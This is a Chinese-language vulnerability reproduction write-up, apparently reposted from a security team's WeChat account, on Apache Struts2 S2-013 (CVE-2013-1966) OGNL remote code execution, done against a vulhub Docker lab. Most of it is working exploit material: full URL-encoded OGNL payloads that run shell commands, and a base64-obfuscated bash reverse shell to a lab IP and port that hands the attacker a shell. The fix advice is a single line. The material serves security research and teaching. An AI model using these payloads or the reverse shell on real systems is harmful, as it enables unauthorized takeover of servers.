1 漏洞信息
| 漏洞名称 | 远程代码执行漏洞 |
|---|---|
| 漏洞编号 | CVE-2013-1966 |
| 危害等级 | 高危 |
| 漏洞类型 | 中间件漏洞 |
| 漏洞厂商 | Apache |
| 漏洞组件 | Struts2 |
| 受影响版本 | 2.0.0 <= Struts2 <= 2.3.14.1 |
| 漏洞概述 | url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEParams被赋予了以上参数,struts会进行OGNL解析。 |
2 环境搭建
2.1 环境概述
-
Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-013docker-compose up -d
访问http://192.168.146.158:8013
3 漏洞复现
访问url,构造一个恶意的payload并发送。
/?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27echo+has+vul%27%29.getInputStream%28%29%2C%23b%3Dnew+java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew+java.io.BufferedReader%28%23b%29%2C%23d%3Dnew+char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23out.println%28%27%27%2Bnew+java.lang.String%28%23d%29%29%2C%23out.close%28%29%7Dpayload原型:
/?a=${#_memberAccess["allowStaticMethodAccess"]=true,#a=.lang.Runtime().exec('echo has vul').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=.apache.struts2.ServletActionContext().getWriter(),#out.println(''+new java.lang.String(#d)),#out.close()}发现成功执行了echo has vul,说明存在该漏洞。
既然发现漏洞了,那我们可以构造一个payload,执行id命令。
/?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%2C%23b%3Dnew+java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew+java.io.BufferedReader%28%23b%29%2C%23d%3Dnew+char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23out.println%28%27%27%2Bnew+java.lang.String%28%23d%29%29%2C%23out.close%28%29%7Dpayload原型:
/?a=${#_memberAccess["allowStaticMethodAccess"]=true,#a=.lang.Runtime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=.apache.struts2.ServletActionContext().getWriter(),#out.println(''+new java.lang.String(#d)),#out.close()}成功执行了id命令。
接下来开始反弹shell
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1base加密bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}url编码bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D
访问漏洞url并且添加恶意payload进行抓包。
/?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%2C%23b%3Dnew+java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew+java.io.BufferedReader%28%23b%29%2C%23d%3Dnew+char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23out.println%28new+java.lang.String%28%23d%29%29%2C%23out.close%28%29%7Dpayload原型:
/?a=${#_memberAccess["allowStaticMethodAccess"]=true,#a=.lang.Runtime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=.apache.struts2.ServletActionContext().getWriter(),#out.println(new java.lang.String(#d)),#out.close()}
攻击机进行监听,然后发现成功反弹了shell。
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
- End -
原文始发于微信公众号(NS Demon团队):【漏洞复现】S2-013 远程代码执行漏洞(CVE-2013-1966)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论